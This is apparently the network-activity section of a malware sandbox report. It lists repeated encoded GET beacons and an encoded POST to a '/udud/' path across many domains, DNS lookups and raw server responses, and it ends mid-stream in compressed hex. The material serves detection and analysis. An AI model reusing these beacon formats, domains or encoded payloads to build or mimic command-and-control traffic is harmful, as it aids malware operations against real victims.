Source: global traffic	HTTP traffic detected: GET /udud/?Pl9P8ldX=c3hfmT3ov0JTxeaB3Np5dAzfMERgbCa9qyeMZ0b4or2kTnd0L4sYzpUTGn0LvbcUe5EAajqxEazp9el6mHCoSAKD4KRQ5UefbhtvnOrVvch9BM72k+FCmqI=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.grimfilm.co.krAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /udud/?Pl9P8ldX=ZAUPc22UbAwlmqOcpZtb9jQGZGjNIs5k58OhtZslT+MlZ0MzYVnBwyOCsTvhGHepry8Cy/mecRlkAgE9OO4LtQYiaVzF77nK3tMxOKzIpokQntNvdpDg3pI=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.mindfreak.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /udud/?Pl9P8ldX=CE5650FDbfXnpQA/eK0NgrbRbNtPjFAUxQ7joq83O2JD2van08dDJXT7jPsZwBcB76Ina7ciMfrueGFKvr7HGptlhVNK1F0UnKlYvzZl0mKZiEoX7KROJkU=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.avocatmh.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /udud/?Pl9P8ldX=0fut0+GuUFbft3VBL5xm0Hp90TDKfhipdS4VXGxzAEleMWehH5gQwP182GbMnYpRKYVXdyZjU035jwIjvCFAGk2/B20KDJmRwuIeT4QhTHXMvWA5X1/HJWk=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.lm2ue.usAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /udud/?Pl9P8ldX=o//LU1QIruq3a+llS5WSA3MhPk/fn3r1eotnxTFa/e8OUp/jL5i10F1rY2VLIPDErdjGMTht5s2Ux60YHU9QFnGu9iPsukiHU979EPg7OqcwQWhMz0uyXSg=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.noispisok.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /udud/?Pl9P8ldX=JeW1ywHbInp/iudCt0BoISDa+lnGE8/XYCCr+igFIIlNiJFqeEfQ/jwRjatbRGfuzAuKF9+1993CsJcrjcNhPJvZ+1kkeDtgpfW+DhUrRm2QAt+ZR6HWj8c=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.uhahiq.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /udud/?Pl9P8ldX=FIraThNO5niOHukbO1r8qSNysm+mJ2OOQaLhh3AktbepBJXcjCIQ5u+D5oIg7MUCVA/ZghdlXch7ulyeg4ZZkVaM25CfsdbY6Ciec8CSMOWGBD2e85VJ6eo=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.fivetownsjcc.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /udud/?Pl9P8ldX=+7vgIBjJEgFzVABnblxNZlxcXvtVnPO976cESSRxKNf7HePF9jiwkaXwYbYPT+M2gd9LCxRObe8L7kEVgXr7yG5qgAvgbam/iSwlpjMS4ArI2Mt4ChGP5d0=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.maxiwalls.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /udud/?Pl9P8ldX=TI4e2mgRGjDzVtc2Q6Py5bwpcc1eb12gZ0duId/eBRBY8c2YNmrJo+kJDCAf1WNWS12prRY8Wfa6UPEwF5qWDHqXkvXCbknW9nAX9azEcXWIpZdV+y5+rBk=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.donantedeovulos.spaceAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /udud/?Pl9P8ldX=hGFabcFIFCLvltCtmr9HP7OROVYI8jz1wRRIKEqq2n4QXlxpqgeqG0CRvdN+pVKSvdVheptlxRG17ghg7M8WhiuOrvxilzcVqEvqLqvxpfLmNTwCuTHyXsI=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.valentinaetommaso.itAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /udud/?Pl9P8ldX=PsObB6+xPBRyZVNIbCvU2WSZgkCw8khE9p6p1fw7XNSxe8fb3H1JBnahW35XlkcpsNyADYDExmr6dQQdFworvtXhDNQSnK6hOqfzO1lUJ+gi+DatEY0x4VA=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.funtechie.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /udud/?Pl9P8ldX=pl+m+RwhDilgNhV8y9np651oviBSsBUAcSsMU8DJXuQO/zLKreqMvauOXyOp2DyQLR+zvzGH9k4G3Xo0zK83IFFyM0D1vpL10/nbh1uWm09odGxnF4xzrfg=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.l7aeh.usAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /udud/?Pl9P8ldX=c3hfmT3ov0JTxeaB3Np5dAzfMERgbCa9qyeMZ0b4or2kTnd0L4sYzpUTGn0LvbcUe5EAajqxEazp9el6mHCoSAKD4KRQ5UefbhtvnOrVvch9BM72k+FCmqI=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.grimfilm.co.krAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /udud/?Pl9P8ldX=ZAUPc22UbAwlmqOcpZtb9jQGZGjNIs5k58OhtZslT+MlZ0MzYVnBwyOCsTvhGHepry8Cy/mecRlkAgE9OO4LtQYiaVzF77nK3tMxOKzIpokQntNvdpDg3pI=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.mindfreak.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /udud/?pzH0=GNw0Cp4PdpF&Pl9P8ldX=NYPylna2Z9eGKk0n2zL98jmopuuDXUwTW1hg/NJ4dH1aG6U36Zymeq8Q+jA5ULsRtwMU5Sxc1U1KJPrtknew8LZ9GrpjSEZ/84zq63NvruY/sq3UYTRA7EE= HTTP/1.1Host: www.wp-bits.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /udud/?Pl9P8ldX=lxKI396dcfUopLOCgIwHig2W2DxUvRX97MJRzioDZqj6Mq9AZ90i2wJz7BzjxOGPWVxSz39xtFFcwgb3QegZat7wpytzNwJDmdPz0ImKOxyDMBvGUlbFyek=&pzH0=GNw0Cp4PdpF HTTP/1.1Host: www.academynadpo.ruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /udud/?Pl9P8ldX=FIraThNO5niOHukbO1r8qSNysm+mJ2OOQaLhh3AktbepBJXcjCIQ5u+D5oIg7MUCVA/ZghdlXch7ulyeg4ZZkVaM25CfsdbY6Ciec8CSMOWGBD2e85VJ6eo=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.fivetownsjcc.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /udud/?Pl9P8ldX=+7vgIBjJEgFzVABnblxNZlxcXvtVnPO976cESSRxKNf7HePF9jiwkaXwYbYPT+M2gd9LCxRObe8L7kEVgXr7yG5qgAvgbam/iSwlpjMS4ArI2Mt4ChGP5d0=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.maxiwalls.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /udud/?Pl9P8ldX=TI4e2mgRGjDzVtc2Q6Py5bwpcc1eb12gZ0duId/eBRBY8c2YNmrJo+kJDCAf1WNWS12prRY8Wfa6UPEwF5qWDHqXkvXCbknW9nAX9azEcXWIpZdV+y5+rBk=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.donantedeovulos.spaceAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /udud/?Pl9P8ldX=hGFabcFIFCLvltCtmr9HP7OROVYI8jz1wRRIKEqq2n4QXlxpqgeqG0CRvdN+pVKSvdVheptlxRG17ghg7M8WhiuOrvxilzcVqEvqLqvxpfLmNTwCuTHyXsI=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.valentinaetommaso.itAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /udud/?Pl9P8ldX=PsObB6+xPBRyZVNIbCvU2WSZgkCw8khE9p6p1fw7XNSxe8fb3H1JBnahW35XlkcpsNyADYDExmr6dQQdFworvtXhDNQSnK6hOqfzO1lUJ+gi+DatEY0x4VA=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.funtechie.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /udud/?Pl9P8ldX=pl+m+RwhDilgNhV8y9np651oviBSsBUAcSsMU8DJXuQO/zLKreqMvauOXyOp2DyQLR+zvzGH9k4G3Xo0zK83IFFyM0D1vpL10/nbh1uWm09odGxnF4xzrfg=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.l7aeh.usAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /udud/?Pl9P8ldX=c3hfmT3ov0JTxeaB3Np5dAzfMERgbCa9qyeMZ0b4or2kTnd0L4sYzpUTGn0LvbcUe5EAajqxEazp9el6mHCoSAKD4KRQ5UefbhtvnOrVvch9BM72k+FCmqI=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.grimfilm.co.krAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /udud/?Pl9P8ldX=ZAUPc22UbAwlmqOcpZtb9jQGZGjNIs5k58OhtZslT+MlZ0MzYVnBwyOCsTvhGHepry8Cy/mecRlkAgE9OO4LtQYiaVzF77nK3tMxOKzIpokQntNvdpDg3pI=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.mindfreak.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /udud/?78wx=IVkh-DpXGR&Pl9P8ldX=PsObB6+xPBRyZVNIbCvU2WSZgkCw8khE9p6p1fw7XNSxe8fb3H1JBnahW35XlkcpsNyADYDExmr6dQQdFworvtXhDNQSnK6hOqfzO1lUJ+gi+DatEY0x4VA= HTTP/1.1Host: www.funtechie.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /udud/?78wx=IVkh-DpXGR&Pl9P8ldX=s4Vg1LN8KF8xRZjsTtx1ePAa6rrZ5tQl+fVkjM0Cwqz81ntfAq/M/gVPDnM69uqRMv9oQTSMlpkV8bcLOwxh9sPoo9S5h5afGeOqgp9TfQfssWCdBUAOLW8= HTTP/1.1Host: www.gaglianoart.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /udud/?78wx=IVkh-DpXGR&Pl9P8ldX=FIraThNO5niOHukbO1r8qSNysm+mJ2OOQaLhh3AktbepBJXcjCIQ5u+D5oIg7MUCVA/ZghdlXch7ulyeg4ZZkVaM25CfsdbY6Ciec8CSMOWGBD2e85VJ6eo= HTTP/1.1Host: www.fivetownsjcc.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /udud/?Pl9P8ldX=FIraThNO5niOHukbO1r8qSNysm+mJ2OOQaLhh3AktbepBJXcjCIQ5u+D5oIg7MUCVA/ZghdlXch7ulyeg4ZZkVaM25CfsdbY6Ciec8CSMOWGBD2e85VJ6eo=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.fivetownsjcc.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: www.fivetownsjcc.com
Source: global traffic	DNS traffic detected: DNS query: www.maxiwalls.com
Source: global traffic	DNS traffic detected: DNS query: www.donantedeovulos.space
Source: global traffic	DNS traffic detected: DNS query: www.valentinaetommaso.it
Source: global traffic	DNS traffic detected: DNS query: www.cookedatthebottom.com
Source: global traffic	DNS traffic detected: DNS query: www.funtechie.top
Source: global traffic	DNS traffic detected: DNS query: www.l7aeh.us
Source: global traffic	DNS traffic detected: DNS query: www.grimfilm.co.kr
Source: global traffic	DNS traffic detected: DNS query: www.mindfreak.live
Source: global traffic	DNS traffic detected: DNS query: www.ntt.creditcard
Source: global traffic	DNS traffic detected: DNS query: www.avocatmh.org
Source: global traffic	DNS traffic detected: DNS query: www.lm2ue.us
Source: global traffic	DNS traffic detected: DNS query: www.noispisok.com
Source: global traffic	DNS traffic detected: DNS query: www.578tt67.com
Source: global traffic	DNS traffic detected: DNS query: www.uhahiq.com
Source: global traffic	DNS traffic detected: DNS query: www.weave.game
Source: global traffic	DNS traffic detected: DNS query: www.wp-bits.online
Source: global traffic	DNS traffic detected: DNS query: www.academynadpo.ru
Source: global traffic	DNS traffic detected: DNS query: www.quantumpowerlife.com
Source: global traffic	DNS traffic detected: DNS query: www.osbornesargent.co.uk
Source: global traffic	DNS traffic detected: DNS query: www.4-94.productions
Source: global traffic	DNS traffic detected: DNS query: www.gast.com.pl
Source: global traffic	DNS traffic detected: DNS query: www.gaglianoart.com

Source: unknown

HTTP traffic detected: POST /udud/ HTTP/1.1Host: www.maxiwalls.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.maxiwalls.comReferer: http://www.maxiwalls.com/udud/Content-Length: 205Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Data Raw: 50 6c 39 50 38 6c 64 58 3d 7a 35 48 41 4c 31 4c 56 4e 6b 42 6d 55 41 42 31 62 33 38 31 41 32 70 45 61 2b 6f 33 68 75 47 54 36 62 78 50 52 67 55 52 4d 66 71 55 66 76 4b 63 6c 69 69 4d 68 36 62 30 42 4c 59 35 4f 36 34 45 73 73 55 64 4b 6e 4e 50 46 66 42 77 72 45 41 64 6e 6d 75 55 6c 33 6c 6a 67 51 6e 35 46 37 43 48 37 52 64 31 70 44 64 49 2f 78 32 58 39 36 6b 57 43 78 4b 32 32 6f 32 46 74 65 32 48 66 4d 31 2b 47 6d 72 38 61 79 43 58 6f 49 7a 75 7a 6c 38 61 32 73 47 4d 72 51 74 49 30 71 69 74 73 6d 58 45 44 4a 65 75 31 44 5a 53 63 74 77 30 52 44 4f 76 4c 2b 51 43 37 6f 4f 33 47 4a 4f 4f 42 78 48 79 34 41 3d 3d Data Ascii: Pl9P8ldX=z5HAL1LVNkBmUAB1b381A2pEa+o3huGT6bxPRgURMfqUfvKcliiMh6b0BLY5O64EssUdKnNPFfBwrEAdnmuUl3ljgQn5F7CH7Rd1pDdI/x2X96kWCxK22o2Fte2HfM1+Gmr8ayCXoIzuzl8a2sGMrQtI0qitsmXEDJeu1DZSctw0RDOvL+QC7oO3GJOOBxHy4A==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:30:56 GMTServer: ApacheX-SERVER: 3908Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 64 75 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /udud/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 27 May 2024 10:31:32 GMTServer: ApacheContent-Length: 199Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 27 May 2024 10:31:35 GMTServer: ApacheContent-Length: 199Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 27 May 2024 10:31:38 GMTServer: ApacheContent-Length: 199Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 27 May 2024 10:32:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: PHPSESSID=716og1qojo3bifpm2m5772tjev; path=/; domain=valentinaetommaso.it; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Encoding: gzipData Raw: 33 37 39 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 7d 6d 77 db c6 92 e6 e7 9b 73 e6 3f 20 dc b9 b9 d2 46 04 5f 25 8a b2 e8 ac 22 cb b1 76 2c 5b d7 92 93 b9 d7 f6 f0 80 20 48 22 26 01 06 00 25 cb 8e 7f d8 7e de 3f b6 cf 53 dd 0d 34 f8 22 d1 4e e6 cc 7c 58 1f 4b 02 d1 dd d5 d5 d5 d5 55 d5 d5 55 cd e3 6f 9f bc 3c bd fe c7 e5 99 33 c9 66 d3 c7 df 1c f3 8f e3 4f bd 34 ed 55 a2 b8 fa 6b 5a 71 e6 49 30 0a 3f f4 2a f1 f8 08 b5 b2 79 7a 54 ab c5 e3 b9 3b 0b 6a 51 fa 3f 2a ce d4 8b c6 bd 4a 98 55 d8 3c f0 86 8f 8f a7 61 f4 de 49 82 69 af 82 b6 7e 1c 45 81 9f 55 9c 09 e0 f4 2a 06 c2 b0 31 0c 9b d3 8f 8b 49 b7 33 9a 34 5d 7f 1a 2f 86 a3 24 8e 32 37 0a 50 d9 4f e2 34 8d 93 70 1c 46 db c1 1b a1 69 ea 8e d3 cc cb 42 df f5 e3 d9 12 8c 59 90 79 8e 3f f1 92 34 c8 7a 95 45 36 aa 1e 56 6c c8 21 f0 fc 22 1c 6b a3 70 1a a4 b5 e6 10 ff 43 fe dc b4 26 6e 7a 33 fe 61 3e e9 f9 83 96 d7 39 0c ba fb 9d 8a 93 dd cd 